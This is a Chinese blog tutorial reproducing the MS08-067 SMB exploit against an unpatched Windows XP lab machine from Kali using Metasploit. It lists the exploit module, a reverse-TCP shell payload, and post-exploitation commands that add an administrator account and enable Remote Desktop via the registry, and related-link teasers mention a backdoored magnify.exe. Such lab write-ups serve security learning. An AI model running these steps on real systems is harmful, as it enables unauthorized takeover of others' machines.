漏洞利用实战(一) winxp的ms08_067漏洞利用复现

最新推荐文章于 2024-04-16 03:05:28 发布
最新推荐文章于 2024-04-16 03:05:28 发布
阅读量3.6k 收藏 8
点赞数 1
分类专栏: 漏洞利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44031198/article/details/102963562
版权

我竟然把这个坑填下去了,可喜可贺。

1  ms08_067

      ms08_067是微软win操作系统中存在的一个服务器服务漏洞,在win server2008之前的系统都会受这个漏洞影响,黑客可以利用这个漏洞控制目标系统。

2  操作概述

      使用kali linux攻击机对win xp系统利用此漏洞进行攻击,在靶机上建立管理员账号并远程控制靶机。

3  实验环境

    kali linux攻击机(上一篇博客提到过)

    win xp sp3 english(纯净版,不带任何补丁)

4  控制靶机

    进入kali终端,输入以下命令运行msf:

msfconsole

寻找并使用模块

    我们要找的是ms08_067漏洞,所以我们首先寻找此漏洞

search ms08_067_netapi

    我们找到漏洞后,使用此漏洞

use exploit/windows/smb/ms08_067_netapi

加载攻击载体

    攻击载体有很多,我们这次使用shell_reverse_tcp

set payload generic/shell_reverse_tcp

设置ip

    LHOST为攻击机ip,RHOST为靶机ip,例如:

set LHOST 192.168.1.62

寻找对应版本target

    target需要与靶机系统版本对应,在不确定版本时设置target为0也可自动选择

set target 0

运行

exploit

    到此,我们就进入了靶机系统,你的kali Terminal应该显示以下信息。

 

5  远程桌面连接

    接下来,我们尝试在靶机上创建账户并使用远程桌面连接靶机,

    首先,我们创建一个账户。

user net host-name password /add

    提升为管理员权限

net localgroup administrators host-name /add

    winxp远程操控端口为3389,我们将这个端口打开

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

    使用netstat查看端口

netstat -an

    这时,我们会发现3389端口处于开启状态。

    然后,我们可以用局域网内的计算机远程桌面连接到靶机,win10运行——>MSTSC。

    以上就是ms08_067漏洞利用复现的全过程。

6  问题记录

访问445端口被拒绝

    装了445端口补丁的winxp将445端口停用,所以复现此例程时不要使用带补丁的win xp。

    还有可能是因为靶机打开了防火墙,复现时需要将防火墙关闭。

设置target

    如果不设置target,将不会判断靶机的系统版本进行攻击。建议将target设置为0,target为0时会自动判断靶机系统版本攻击。

7  小结

    winxp上的漏洞其实还有很多,感兴趣的同学可以查一下其他的漏洞并尝试复现,折腾永不停止!

 

dynMagicGoat
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows xp Ms08067漏洞复现
hintll的博客
11-18 4066
准备工作: 虚拟机 kali Windows xp sp3中文版 先ping双方的ip,以确保双方的网络可以互通 nmap扫描Windows 命令: cd /usr/share/nmap/scripts nmap --script=vuln 192.168.XXX.XXX 扫描后有漏洞ms08067 用mts进行攻击 先找漏洞利用: search 08_067 运用漏洞: use exploit/windowsexploit/windows/smb/ms08_067_netapi 看参数: show op
WinXP安全漏洞知多少
CNssy Blog
01-01 2761
作者:李红    转自:ezIT编者按:Windows XP过去曾被认为“最安全”,可如今发现的XP漏洞是越来越多,利用漏洞实施攻击的病毒也层出不穷,例如去年闹得沸沸扬的冲击波,今年则流行震荡波。现在微软每个月都会在网上发布安全公告,免费提供一些补丁,建议你及时给操作系统打打补丁、更新系统,以便堵上各种安全漏洞。下面就让我们来看看WinXP究竟有哪些严重的安全漏洞……文章导引:一、任务
【网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
最新发布
2401_83946826的博客
04-16 1356
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
漏洞利用:各种漏洞利用和摘要
02-26
各种漏洞利用和摘要
微软最牛MS08-067漏洞各系统补丁下载地址
热门推荐
人生倒计时
12-12 7万+
本次MS08-067严重漏洞各系统补丁地址如下:  中文操作系统KB958644补丁下载地址:  Windows Vista 安全更新程序 (KB958644)  http://download.microsoft.com/download/d/c/0/dc047ab9-53f8-481c-8c46-528b7f493fc1/Windows6.0-KB958644-x86.msu 
入侵网站的各种漏洞的利用
冷血书生的专栏
06-14 5765
信息来源:慕容小雨’s blog  转过来感慨下。主要是给我等不熟悉国内情况的朋友们看看。偶个人认为国内的比国外的难多了~~汗  各种漏洞的利用和一些搜索参数   说到漏洞,首先应该提到的就是动网的上传漏洞了。   "洞网"漏洞拉开了上传漏洞文件的序幕,其他系统的上   传漏洞接踵而来!   asp动网论坛漏洞分析   1、这个漏洞不算太严重,用过动网论坛的人都知道,发帖时直接写javascrip
CN_WINXP_PRO_ISO.img.zip
11-18
CN_WINXP_PRO_ISO.img.zip
WinXP_VHD_2011
03-08
标题“WinXP_VHD_2011”指的是一个与Windows XP操作系统相关的虚拟硬盘(Virtual Hard Disk,简称VHD)文件,可能是一个包含了2011年版本的Windows XP安装的虚拟磁盘映像。VHD是一种文件格式,用于存储操作系统、...
WinXP_VHD_201和vbootd
04-07
WinXP_VHD_201和vbootdsk驱动
利用xp漏洞建立管理员账号
12-09
我的方法是利用放大镜。把压缩包解压,用里面的magnify.exe替换winxp自己的放大镜程序,然后在登录前使用win+U键启动放大镜,也就是启动了下载的magnify.exe,程序就会创建名为caiwu的账号并且赋予管理员权限,密码...
#windowsxpsp3系统MS10-046漏洞测试
bmxch的博客
01-24 560
一、影响环境 Windows 2000、WindowsXPWindows server 2003、Windows Vista、Windows server 2008、Windows7 beta。 **二、**实验环境(虚拟机搭建) 目标主机:winxpsp3英文版:192.168.28.133 攻击主机:kaililinux:192.168.28.134 三、攻击过程 先用nmap扫描内部192.168.28.0/24位的网段查看是否有xp系统的主机存活 进入metasploit框架 Msfcons
Ms08067漏洞复现wp
m0_55185160的博客
11-18 3027
一.实验前准备 1.在虚拟机上搭建好kail 2.在虚拟机上搭建一台Windows xp sp3 英文版 二.实验步骤 1.查看两台虚拟机的ip并记录kail:192.168.208.128 xp:192.168.208.133 2.查看两台虚拟机之间是否联通,并关闭xp的防火墙以及自动更新功能 3.在kali终端中开启msfconsole。 4.输入命令search ms08_067,会显示出我们要的渗透模块 5.输入命令 use exploit/windows/smb/ms.
Windows XP SP3(MS08-067漏洞复现及利用)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
08-01 2079
把以前做的实验和写在有道云里的笔记整理下,放到CSDN上 一、实验环境 靶机:Windows XP SP3 专业版(关闭Windows自带的防火墙!!!) 攻击机:Kali Linux 2020 靶机IP : 192.168.204.131 攻击机IP:192.168.204.128 二、漏洞利用 msf5 > search ms08-067 Matching Modules ================ # Name D
虚拟机winxp纯净_WinXPMS08067漏洞利用复现和解决方案
weixin_39760619的博客
12-04 139
点击上方蓝字关注我们漏洞利用前准备寻找漏洞·CVEhttps://cve.mitre.org/Common Vulnerabilities & Exposures公共漏洞和暴露, 由MITRE 1999年发起以社区作为努力方向·NVDhttps://nvd.nist.gov/美国国家通用漏洞数据库,National Institute of Standards and Tec...
MS08_067_netapi漏洞复现
weixin_45418565的博客
05-02 858
MS08_067_netapi漏洞复现 winxp的ip地址为192.168.0.101 kali的ip地址为192.168.0.105 确保两台主机能ping通 接着我们使用kali中自带的msf进行攻击 开启postgresql数据库 service postgresql start 启动msf msfconsole 我们利用msf的数据库搜索相应winxp的漏洞 search...
MS08067利用方法
weixin_40789841的博客
01-21 1158
一、实验目的及要求 1. 掌握利用MS08067远程溢出工具发送特殊构造的数据包,使目标主机产生溢出,然后执行shellcode代码,,打开目标主机端口,使用telnet连接目标端口,获得系统权限。 二、实验设备(环境)及要求 PC机, VC++等,虚拟云平台 三、实验内容与步骤 1.进入”c:\tools\MS08067利用方法”的目录 ...
网络安全 基础之 Windows漏洞复现(MS12-020)死亡蓝屏
weixin_60888404的博客
06-02 3086
死亡蓝屏漏洞
Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)
qq_43093288的博客
03-25 1800
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。注:发现Windows XP SP2 (Simplified Chinese)存在多个漏洞:ms17-010,ms08-067,,但是我们现在只考虑ms08-067。注:发现Windows XP SP2 (Simplified Chinese)的IP:172.16.12.101。
msvcr120_path_winxp_sp2
06-28
因此,msvcr120_path_winxp_sp2是指一个文件的路径,该文件是Microsoft Visual C++ 2013版的运行时库,位于与某个程序相关的文件夹中,并且可以在Windows XP的Service Pack 2版本中使用。这个文件可能与某个程序的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值